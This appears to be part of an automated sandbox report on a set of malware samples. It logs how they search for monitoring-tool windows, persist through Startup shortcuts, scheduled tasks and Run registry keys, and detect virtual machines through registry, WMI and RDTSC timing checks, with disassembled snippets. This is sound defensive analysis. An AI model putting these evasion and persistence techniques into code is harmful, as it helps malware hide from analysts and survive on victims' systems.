Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Source: C:\Users\user\Documents\AAAAECGHCB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9faf801df7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9faf801df7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0fb4fa91ba.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0fb4fa91ba.exe

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\AAAAECGHCB.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E760 second address: 139E77D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13978A5 second address: 13978AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13978AB second address: 13978AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13978AF second address: 13978B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DF09 second address: 139DF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DF0D second address: 139DF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F1D94F8162Ch 0x0000000e js 00007F1D94F8162Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DF2B second address: 139DF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F1D94C8C5BEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A088B second address: 13A0891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0891 second address: 13A08CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1D94C8C5C6h 0x0000000a popad 0x0000000b nop 0x0000000c je 00007F1D94C8C5BCh 0x00000012 mov dword ptr [ebp+122D28FAh], esi 0x00000018 push 00000000h 0x0000001a mov dx, DE73h 0x0000001e push 3FC230B1h 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A08CA second address: 13A092A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 3FC23031h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F1D94F81628h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000003h 0x0000002a push edx 0x0000002b xor dword ptr [ebp+122D2A7Eh], eax 0x00000031 pop edi 0x00000032 mov esi, dword ptr [ebp+122D3A35h] 0x00000038 push 00000000h 0x0000003a mov edi, 2672C711h 0x0000003f push 00000003h 0x00000041 xor dword ptr [ebp+122D2810h], eax 0x00000047 push C8FC553Ah 0x0000004c pushad 0x0000004d jmp 00007F1D94F8162Bh 0x00000052 pushad 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A092A second address: 13A0948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 08FC553Ah 0x0000000d movzx edx, bx 0x00000010 lea ebx, dword ptr [ebp+1246477Dh] 0x00000016 mov cl, BEh 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A09B3 second address: 13A09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F81635h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A09CD second address: 13A0A1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1D94C8C5B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2925h], edi 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 ja 00007F1D94C8C5BCh 0x0000001c mov esi, dword ptr [ebp+122D37C5h] 0x00000022 pop ecx 0x00000023 call 00007F1D94C8C5B9h 0x00000028 pushad 0x00000029 je 00007F1D94C8C5C0h 0x0000002f push ecx 0x00000030 pushad 0x00000031 popad 0x00000032 pop ecx 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jl 00007F1D94C8C5B6h 0x0000003e push esi 0x0000003f pop esi 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0A1E second address: 13A0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F81635h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0B0E second address: 13A0B20 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0B20 second address: 13A0B7D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1D94F81632h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007F1D94F81636h 0x0000001a pushad 0x0000001b jg 00007F1D94F81626h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 popad 0x00000025 pop eax 0x00000026 mov esi, dword ptr [ebp+122D3751h] 0x0000002c lea ebx, dword ptr [ebp+12464786h] 0x00000032 mov esi, dword ptr [ebp+122D3735h] 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0B7D second address: 13A0B83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0C5C second address: 13A0C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1D94F81639h 0x00000008 jnl 00007F1D94F81626h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F1D94F81636h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0C9E second address: 13A0CE3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1D94C8C5BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push edi 0x00000010 jmp 00007F1D94C8C5C6h 0x00000015 pop edi 0x00000016 pushad 0x00000017 jmp 00007F1D94C8C5C5h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0CE3 second address: 13A0D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jp 00007F1D94F81630h 0x00000013 jmp 00007F1D94F8162Ah 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jp 00007F1D94F81626h 0x00000025 jnp 00007F1D94F81626h 0x0000002b popad 0x0000002c push ecx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pop ecx 0x00000030 popad 0x00000031 pop eax 0x00000032 mov dx, ax 0x00000035 push 00000003h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F1D94F81628h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 sub dword ptr [ebp+122D28DFh], edi 0x00000059 push 00000003h 0x0000005b jmp 00007F1D94F81637h 0x00000060 push 6191C734h 0x00000065 push eax 0x00000066 push edx 0x00000067 push ebx 0x00000068 jmp 00007F1D94F8162Dh 0x0000006d pop ebx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0D75 second address: 13A0DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5E6E38CCh 0x00000010 call 00007F1D94C8C5C4h 0x00000015 mov edi, ebx 0x00000017 pop edi 0x00000018 jp 00007F1D94C8C5BAh 0x0000001e lea ebx, dword ptr [ebp+12464791h] 0x00000024 adc si, 4A0Fh 0x00000029 mov ecx, 2BD90D42h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push edi 0x00000033 pop edi 0x00000034 jmp 00007F1D94C8C5C7h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0535 second address: 13C053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0795 second address: 13C07AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1D94C8C5C5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C07AF second address: 13C07B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1D94F8162Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0BD4 second address: 13C0BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0BD8 second address: 13C0BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0D24 second address: 13C0D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1D94C8C5BAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0D3C second address: 13C0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0D42 second address: 13C0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0D4D second address: 13C0D53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0D53 second address: 13C0D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0ED9 second address: 13C0EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0EFA second address: 13C0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
